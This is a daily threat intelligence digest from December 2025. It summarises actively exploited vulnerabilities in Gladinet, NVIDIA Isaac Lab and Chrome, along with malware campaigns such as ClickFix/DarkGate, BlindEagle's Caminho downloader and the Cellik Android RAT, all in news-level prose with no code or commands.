Daily Threat Intel Digest - December 17, 2025

🔴 Critical Threats & Active Exploitation

[NEW] CISA Warns of Actively Exploited Hardcoded Keys in Gladinet CentreStack/Triofox
Attackers are exploiting hardcoded cryptographic keys in Gladinet CentreStack and Triofox cloud storage platforms to achieve remote code execution without authentication. The vulnerability (CVE-2025-14611) allows Local File Inclusion attacks, enabling data theft and full system compromise. CISA added this to its KEV catalog with a federal remediation deadline of January 5, 2026, but warns all organizations to patch immediately due to active exploitation [CyberPress; GBHackers]. Over 80,000 organizations use these platforms for secure file sharing.

[NEW] Critical RCE in NVIDIA Isaac Lab Exploited in the Wild
A deserialization flaw (CVE-2025-32210) in NVIDIA’s Isaac Lab robotics simulation framework enables unauthenticated remote code execution with CVSS 9.0 severity. Attackers can hijack systems running vulnerable versions (<v2.3.0) across all platforms, potentially stealing sensitive AI research data or deploying ransomware. NVIDIA confirmed active exploitation and urged immediate patching, though attacker origins remain unclear [CyberPress; GBHackers].

[NEW] Parked Domains Become Primary Malware Distribution Channel
New Infoblox research reveals over 90% of visits to parked domains now lead to malware, scams, or phishing—a dramatic shift from <5% maliciousness a decade ago. Attackers leverage “direct search” advertising models and cloaking to redirect real users (not scanners) through multi-layered traffic distribution systems delivering Tedy malware, credential theft, and scams. Major brands like Netflix, Gmail, and Scotiabank are typosquatted, while one actor controls 80,000+ domains using “double fast flux” DNS to resist takedowns [CyberPress; GBHackers].

[UPDATE] Chrome Emergency Update Patches Actively Exploited RCE Flaws
Google released Chrome 143.0.7499.146/.147 to address two high-severity vulnerabilities: CVE-2025-14765 (use-after-free in WebGPU) and CVE-2025-14766 (out-of-bounds read/write in V8). Both enable remote code execution, with the first flaw awarded a $10,000 bounty. While disclosure details are restricted pending patch adoption, Google’s urgent rollout signals active exploitation risk—continuing the trend of zero-day Chrome attacks flagged in prior reporting [CyberPress; GBHackers].

🎯 Threat Actor Activity & Campaigns

[NEW] “ClickFix” Social Engineers Deliver DarkGate via Fake Browser Alerts
A new campaign tricks users into executing malicious PowerShell commands by spoofing “Word Online extension not installed” errors. Victims copy/paste obfuscated PowerShell commands from pop-ups into Windows Run dialogs, deploying DarkGate malware through HTA files and AutoIt scripts. Attackers use clipboard manipulation and multi-stage payloads to evade detection, leveraging MITRE TTPs like T1059.001 (PowerShell) and T1027 (Obfuscation) [CyberPress; GBHackers].

[NEW] BlindEagle Targets Colombian Government with Caminho Downloader
BlindEagle (APT-C-36) compromised a Colombian Ministry of Commerce email account to launch spear-phishing campaigns delivering DCRAT RAT via the Caminho downloader. The attack chain uses fraudulent judicial portals, nested JavaScript/PowerShell scripts, and steganography to hide payloads in PNG files. DCRAT employs AES-256 encryption and certificate-based C2 authentication, while Caminho’s Portuguese code hints at Brazilian cybercrime origins [CyberPress; Zscaler Research].

[NEW] Cellik Android RAT Automates Play Store App Infection
A new MaaS offering called Cellik enables attackers to inject spyware into legitimate Google Play apps via a one-click APK builder. For $150/month, it provides live screen streaming, notification interception, hidden browser activity, and credential overlay theft. The malware claims to bypass Play Protect and has already been observed in trojanized apps, escalating risks for Android users sideloading APKs [CyberPress; BleepingComputer].